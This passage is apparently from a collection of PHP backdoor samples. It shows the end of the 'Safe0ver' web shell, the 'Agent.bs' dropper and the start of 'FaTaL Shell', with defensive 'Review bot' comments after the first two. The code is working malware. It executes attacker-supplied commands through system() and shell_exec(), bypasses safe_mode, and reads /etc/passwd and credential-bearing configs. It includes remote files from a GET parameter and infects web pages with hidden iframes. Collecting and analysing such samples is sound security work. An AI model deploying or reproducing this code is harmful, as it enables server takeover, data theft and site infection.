echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
}
/* <!-- Other Actions --> */
echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
echo "</table></td>";
echo "</table>";
echo "<br>";
@closedir($h);
}
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
echo system("$file");
}
elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (Mydeldir($file)==false) {
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (@unlink($file)==false) {
echo "Could not remove \"$file\"<br>";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
echo "<center><table><tr><td NOWRAP>";
$i = 1;
while (file_exists("$lastdir/newfile$i.txt"))
$i++;
$file = fopen("$lastdir/newfile$i.txt", "w+");
if ($file == false)
echo "Could not create the new file...<br>";
else
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
echo "
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center>
</td></tr></table></center> ";
}
elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
echo "<center><table><tr><td NOWRAP>" ;
$i = 1;
while (is_dir("$lastdir/newdir$i"))
$i++;
$file = mkdir("$lastdir/newdir$i", 0777);
if ($file == false)
echo "Could not create the new directory...<br>";
else
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center></td></tr></table></center>";
}
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
$contents = "";
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
$contents .= htmlentities( $line ) ;
}
echo "<br><center><table><tr><td NOWRAP>";
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
echo "<strong>EDIT FILE: </strong>$file<br>\n";
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
echo "<input type=\"submit\" value=\"Save\">";
echo "</form>";
echo "</td></tr></table></center>";
}
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
$fo = fopen($file, "w");
$wrret = fwrite($fo, stripslashes($contents));
$clret = fclose($fo);
}
elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
$downloadfile = urldecode($file);
if (function_exists("basename"))
$downloadto = basename ($downloadfile);
else
$downloadto = "download.ext";
if (!file_exists("$downloadfile"))
echo "The file does not exist";
else {
$size = @filesize("$downloadfile");
if ($size != false) {
$add="; size=$size";
}
else {
$add="";
}
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=$downloadto$add");
$fp=fopen("$downloadfile" ,"rb");
fpassthru($fp);
flush();
}
}
elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
?>
<center>
<table>
<tr>
<td NOWRAP>
Dosya Yükleme Sekmesine Tikladiniz !
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Dosya Yükle:<br>
<input size="75" name="userfile" type="file"><br>
<input type="submit" value="Yükle">
</form>
<br>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
<input tabindex="0" type="submit" value="Iptal">
</form>
</td>
</tr>
</table>
</center>
<?php
}
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
echo "<center><table><tr><td NOWRAP>";
if (file_exists($userfile))
$res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) {
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
}
else {
echo "Yüklenemedi...";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
echo "<br><br></td></tr></table></center>";
}
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
echo "<hr>";
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
echo spacetonbsp(@htmlentities($line))."<br>\n";
}
echo "<hr>";
}
elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
if (function_exists('is_dir')) {
if (is_dir("$oldfile")) {
$objname = "Directory";
$objident = "Directory";
}
else {
$objname = "Filename";
$objident = "file";
}
}
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
If (empty($newfile) != true) {
echo "<center>";
$return = @rename($oldfile, "$olddir$newfile");
if ($return) {
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
}
else {
if ( @file_exists("$olddir$newfile") ) {
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
}
else {
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
}
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
}
else {
$dpos = strrpos($oldfile, "/");
if (strval($dpos)!="") {
$olddir = substr($oldfile, 0, $dpos+1);
}
else {
$olddir = "$lastdir/";
}
$fpos = strrpos($oldfile, "/");
if (strval($fpos)!="") {
$inputfile = substr($oldfile, $fpos+1);
}
else {
$inputfile = "";
}
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
echo "Rename \"$oldfile\" to:<br>\n";
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "</td></tr></table></center>";
}
}
else if ( $cmd == "con") {
?>
<center>
<table>
<tr><td>&nbsp;</td>
</tr></table>
<?php
}
else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
$isMainMenu = true;
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="border">
<center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
</td>
</tr>
</table>
<br>
<center>
<table border="0" NOWRAP>
<tr>
<td valign="top" class="silver border">
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
</span></td>
</tr>
</table>
<br><p><br>Safe Mode ByPAss<p><form method="POST">
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<input type="submit" value="Çalistir"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="dizin">
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
<option value="cat /etc/passwd">cat /etc/passwd</option>
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
<option value="cat /etc/hosts">cat /etc/hosts</option>
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
<option value="netstat -an | grep -i listen">Açik Portlar</option>
<option value="ps -aux">Çalisan Uygulamalar</option>
</select> <input type="submit" value="Çalistir"></p>
</form>
------------------------------------------------------------------------------------<p>
<?
$evilc0der=$_POST['dizin'];
if($_POST['dizin'])
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$safemodgec = shell_exec($evilc0der);
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
}
?>
</center>
<br>
<?php
}
if ($cmd != "downl") {
if ( $isMainMenu != true) {
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" style="class="silver border">
<center><strong>
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
</strong></center>
</td>
</tr>
</table>
<br>
<?php
}
?>
<table width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<?php
}
?>
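Review bot: The `document.write(unescape('%3C%53...'))` call in the `<HEAD>` block of this sample is undocumented and decodes to a `<SCRIPT SRC=...>` tag that loads `yaz.js` from `www.php-shell[.]org/cwhidden/`, so opening the rendered page makes an outbound request, and a deployed copy would presumably disclose its own URL to that host through the Referer header. I would record this next to the sample instead of editing the file (which would change its hash), for example `Agent.br (Safe0ver): percent-encoded remote script include in page head; open only in an isolated environment without egress`. The same note should list the request surface for detection: `walkArray()` copies every GET/POST key into a global, `cmd` selects the branch, `file` reaches `system()`, `unlink()` and `fopen()`, and the POST field `dizin` reaches `shell_exec()`, all without filtering. The `ini_restore("safe_mode")` / `ini_restore("open_basedir")` pair immediately before `shell_exec()` and the commented-out `$http_auth_user` / `$http_auth_pass` lines are stable strings for a static signature.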

76
PHP/Backdoor.PHP.Agent.bs Normal file

@ -0,0 +1,76 @@
<?
$dir = @getcwd();
echo "Jikustik<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src=\"mailto:store@keptprivate.com\"
width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
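Review bot: The three `foreach (glob(...))` loops at the end of this sample run unconditionally on every request and append the hidden zero-size `mailto:` IFRAME held in `$codigo` to each `.php`, `.htm` and `.html` file directly under `DOCUMENT_ROOT`, and nothing on the page documents that side effect. Because the files are opened with `a+` and there is no marker check, each hit would append another copy, and `glob()` as called here does not descend into subdirectories, so cleanup has to expect repeated copies in top-level files only. I would record that beside the sample rather than in it: `Agent.bs: on load runs "id" through ex() (exec, shell_exec, system, passthru, popen fallback) and appends a hidden mailto: IFRAME to top-level web files; check the docroot for the appended line and for unexpected mtime changes`. The `ereg_replace` / `eregi_replace` calls were removed in PHP 7, so on a current runtime the `DOCUMENT_ROOT` fallback branch would fail if it were ever reached, which matters when reproducing the behaviour in a sandbox.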

301
PHP/Backdoor.PHP.Agent.ca Normal file

@ -0,0 +1,301 @@
<? include $_GET['baba']; ?>
<?php
$a = "http://"; //need some codes
$b = "evilc0der.com"; //need some hits
$c = "/x.html"; //need scripts coder's names
session_start();
error_reporting(E_ALL ^ E_NOTICE);
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$version='version 1.0 by FaTaLErrOr';
$action=$_POST['action'];
$file=$_POST['file'];
$dir=$_POST['dir'];
$content='';
$stdata='';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$lang=array(
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
'uploadok'=>'Baþarýyla Yüklendi.',
'dircrt'=>'Klasör Oluþturuldu.',
'dontlist'=>'Listelenemiyor Ýzin Yok.',
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
'dirnf'=>'Dizin Bulunamadi.',
'filenf'=>'.',
'dontwrdir'=>'Sadece Okunabilir.',
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
'deletefileok'=>'Dosya Silindi.',
'deletedirok'=>'Klasör Silindi.',
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
'workdir'=>'Çalýþma Dizini: ',
'fullacc'=>'Full Yetki.',
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
'thisnodir'=>'Klasör Seçin.',
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
);
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
function test_file($file){
if(!file_exists($file))$err="1";
elseif(!is_file($file)) $err="2";
elseif(!is_readable($file))$err="3";
elseif(!is_writable($file))$err="4"; else $err="5";
return $err;}
function test_dir($dir){
if(!file_exists($dir))$err="1";
elseif(!is_dir($dir)) $err="2";
elseif(!is_readable($dir))$err="3";
elseif(!is_writable($dir))$err="4"; else $err="5";
return $err;}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;}
function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
if(isset($dir)){
$ts['test']=test_dir($dir);
switch($ts['test']){
case 1:$stdata.=$lang['dirnf'];break;
case 2:$stdata.=$lang['thisnodir'];break;
case 3:$stdata.=$lang['dontlist'];break;
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
}else $dir=@chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if(isset($file)){
$ts['test1']=test_file($file);
switch ($ts['test1']){
case 1:$stdata.=$lang['filenf'];break;
case 2:$stdata.=$lang['isdontfile'];break;
case 3:$stdata.=$lang['cantrfile'];break;
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
}
function shell($cmd)
{
global $lang;
$ret = '';
if (!empty($cmd))
{
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
else $ret=$lang['allfuncsh'];
}
return $ret;
}
function createdir($dir){mkdir($dir);}
//delete file
if($action=="delete"){
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//delete dir
if($action=="deletedir"){
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//shell
if($action=="shell"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
<input type=\"submit\" value=\"Uygula\"></form>";}
//editor
if($action=="editor"){
$stdata.="<form method=POST>
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
clearstatcache();
$f=fopen($file, "r");
$contents = fread($f,filesize($file));
fclose($f);
return htmlspecialchars($contents);
}
if(@$_POST['save'])writef($file,$_POST['data']);
if(@$_POST['create'])writef($file,"");
$test=test_file($file);
if($test==1){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
<input type=\"reset\" value=\"No\"></form>";
}
if($test>2){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
}}
//viewer
if($action=="viewer"){
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
if ($GLOBALS['os']==1) {
$content.="<tr><td>HDD Secin:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
$content.="</td></tr>";
}
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
}
for($i=0;$i<count($files);$i++) {
